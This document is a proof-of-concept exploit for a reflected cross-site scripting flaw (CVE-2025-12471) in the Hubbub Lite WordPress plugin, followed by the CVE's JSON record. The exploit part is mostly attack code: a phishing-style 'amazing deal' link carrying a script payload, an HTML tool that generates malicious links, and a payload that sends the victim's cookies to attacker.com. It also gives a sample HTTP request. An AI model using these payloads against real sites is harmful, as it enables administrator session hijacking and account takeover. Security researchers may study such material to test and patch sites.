CVE-2025-12471

<!-- CVE-2025-12471 PoC - Reflected XSS in Hubbub Lite plugin --> <!-- Target: WordPress site with Hubbub Lite plugin <= 1.36.0 --> <!-- Method 1: Direct link exploitation --> <!-- Construct malicious URL with XSS payload --> <a href="http://target-wordpress-site.com/wp-admin/admin.php?page=dpsp-submenu-page-dashboard&dpsp_list_attention_search=<script>alert(document.domain)</script>">Click here for amazing deal!</a> <!-- Method 2: Automated PoC --> <!DOCTYPE html> <html> <head> <title>CVE-2025-12471 PoC</title> </head> <body> <h2>CVE-2025-12471 Reflected XSS PoC</h2> <p>Target URL: <input type="text" id="targetUrl" size="50" placeholder="http://target-site.com"></p> <button onclick="exploit()">Generate Malicious Link</button> <div id="result"></div> <script> function exploit() { const baseUrl = document.getElementById('targetUrl').value; const payload = '<script>alert("XSS - CVE-2025-12471");document.location="http://attacker.com/steal?c="+encodeURIComponent(document.cookie)<\/script>'; const maliciousUrl = baseUrl + '/wp-admin/admin.php?page=dpsp-submenu-page-dashboard&dpsp_list_attention_search=' + encodeURIComponent(payload); document.getElementById('result').innerHTML = '<p>Malicious Link: <a href="' + maliciousUrl + '" target="_blank">' + maliciousUrl + '</a></p>'; } </script> </body> </html> <!-- HTTP Request Example: GET /wp-admin/admin.php?page=dpsp-submenu-page-dashboard&dpsp_list_attention_search=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E HTTP/1.1 Host: target-site.com Cookie: [admin session cookies] --> <!-- Impact: Session hijacking, credential theft, admin account takeover -->

{"cve": {"id": "CVE-2025-12471", "sourceIdentifier": "[email protected]", "published": "2025-11-06T07:15:43.510", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Hubbub Lite – Fast, free social sharing and follow buttons plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'dpsp_list_attention_search' parameter in all versions up to, and including, 1.36.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/social-pug/tags/1.36.0/inc/admin/views/view-submenu-page-dashboard.php#L225", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3389831%40social-pug%2Ftrunk&old=3373974%40social-pug%2Ftrunk&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fe848a09-edd3-4eea-befb-909d15ba1994?source=cve", "source": "[email protected]"}]}}